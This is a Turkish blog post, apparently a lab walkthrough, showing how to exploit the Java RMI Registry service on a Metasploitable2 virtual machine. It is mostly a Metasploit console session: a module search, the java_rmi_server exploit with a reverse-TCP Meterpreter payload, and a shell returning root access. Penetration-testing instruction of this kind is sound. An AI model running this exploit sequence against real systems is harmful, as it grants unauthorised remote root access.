Mayıs 26, 2022
11 11 11 ÖÖ
2048 Old Game Privacy Policy
Scan Text – Metin Tarayıcı Terms & Conditions
Scan Text – Metin Tarayıcı Privacy Policy
Calculator – Hesap Makinesi Privacy Policy
Calculator – Hesap Makinesi Terms & Conditions
QR Code Reader – Kare Kod Okuyucu Terms & Conditions
QR Code Reader – Kare Kod Okuyucu Privacy Policy
Show PDF – PDF Görüntüleyici Terms & Conditions
Show PDF – PDF Görüntüleyici Privacy Policy
Photo Editor – Resim Düzenleme Uygulaması Terms & Conditions
Son Yazılar
2048 Old Game Privacy Policy Scan Text – Metin Tarayıcı Terms & Conditions Scan Text – Metin Tarayıcı Privacy Policy Calculator – Hesap Makinesi Privacy Policy Calculator – Hesap Makinesi Terms & Conditions QR Code Reader – Kare Kod Okuyucu Terms & Conditions QR Code Reader – Kare Kod Okuyucu Privacy Policy Show PDF – PDF Görüntüleyici Terms & Conditions Show PDF – PDF Görüntüleyici Privacy Policy Photo Editor – Resim Düzenleme Uygulaması Terms & Conditions
metasploitable2 exploit

Java RMI Registry Exploit Nedir ?

Paylaşım , Takip İçin

Java_rmi

Java RMI  (Remote Method Invocation – Uzak Metod Çağrısı)ile bir makina üzerinde çalışan bir java nesnesinin, başka bir makina üzerinde çalışan diğer bir java nesnesinin metodunun çağırmasını sağlanır.nmapte 1099 portunda çalıştığı görülebilir.

1099/tcp open  java-rmi         Java RMI Registry

msf6 > search java rmi

Matching Modules
================

# Name Disclosure Date Rank Check Description
– —- ————— —- —– ———–
0 exploit/multi/misc/java_jmx_server 2013-05-22 excellent Yes Java JMX Server Insecure Configuration Java Code Execution
1 auxiliary/scanner/misc/java_jmx_server 2013-05-22 normal No Java JMX Server Insecure Endpoint Code Execution Scanner
2 auxiliary/gather/java_rmi_registry normal No Java RMI Registry Interfaces Enumeration
3 exploit/multi/misc/java_rmi_server 2011-10-15 excellent Yes Java RMI Server Insecure Default Configuration Java Code Execution
4 auxiliary/scanner/misc/java_rmi_server 2011-10-15 normal No Java RMI Server Insecure Endpoint Code Execution Scanner
5 exploit/multi/browser/java_rmi_connection_impl 2010-03-31 excellent No Java RMIConnectionImpl Deserialization Privilege Escalation
6 exploit/multi/browser/java_signed_applet 1997-02-19 excellent No Java Signed Applet Social Engineering Code Execution
7 exploit/multi/http/jenkins_metaprogramming 2019-01-08 excellent Yes Jenkins ACL Bypass and Metaprogramming RCE
8 exploit/linux/misc/jenkins_java_deserialize 2015-11-18 excellent Yes Jenkins CLI RMI Java Deserialization Vulnerability
9 exploit/multi/browser/firefox_xpi_bootstrapped_addon 2007-06-27 excellent No Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
10 exploit/multi/http/totaljs_cms_widget_exec 2019-08-30 excellent Yes Total.js CMS 12 Widget JavaScript Code Injection


Interact with a module by name or index. For example info 10, use 10 or use exploit/multi/http/totaljs_cms_widget_exec

msf6 > use 3
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

Name Current Setting Required Description
—- ————— ——– ———–
HTTPDELAY 10 yes Time that the HTTP Server will wait f
or the payload request
RHOSTS yes The target host(s), range CIDR identi
fier, or hosts file with syntax ‘file
:<path>’
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface t
o listen on. This must be an address
on the local machine or 0.0.0.0 to li
sten on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connection
s
SSLCert no Path to a custom SSL certificate (def
ault is randomly generated)
URIPATH no The URI to use for this exploit (defa
ult is random)


Payload options (java/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.138.128 yes The listen address (an interface may be s
pecified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
— —-
0 Generic (Java Payload)


msf6 exploit(multi/misc/java_rmi_server) > set rhost 192.168.138.129
rhost => 192.168.138.129
msf6 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.138.128:4444
[*] 192.168.138.129:1099 – Using URL: http://0.0.0.0:8080/6kEum7A3
[*] 192.168.138.129:1099 – Local IP: http://192.168.138.128:8080/6kEum7A3
[*] 192.168.138.129:1099 – Server started.
[*] 192.168.138.129:1099 – Sending RMI Header…
[*] 192.168.138.129:1099 – Sending RMI Call…
[*] 192.168.138.129:1099 – Replied to request for payload JAR
[*] Sending stage (58082 bytes) to 192.168.138.129
[*] Meterpreter session 1 opened (192.168.138.128:4444 -> 192.168.138.129:44124) at 2021-05-29 15:22:37 +0300
[*] 192.168.138.129:1099 – Server stopped.

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > shell
Process 1 created.
Channel 1 created.
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Sisteme root haklarıyla giriş yapılmıştır. 
Dilerseniz Meterpreter komutlarına bakabilirsiniz . 

Paylaşım , Takip İçin
5 1 vote
Article Rating

Bir Cevap Yazın

1 Yorum
Eskiler
En Yeniler Beğenilenler
Inline Feedbacks
View all comments

[…] java_rmi […]

1
0
Would love your thoughts, please comment.x
()
x
HAYALİNDEKİ YAZILIM
%d blogcu bunu beğendi: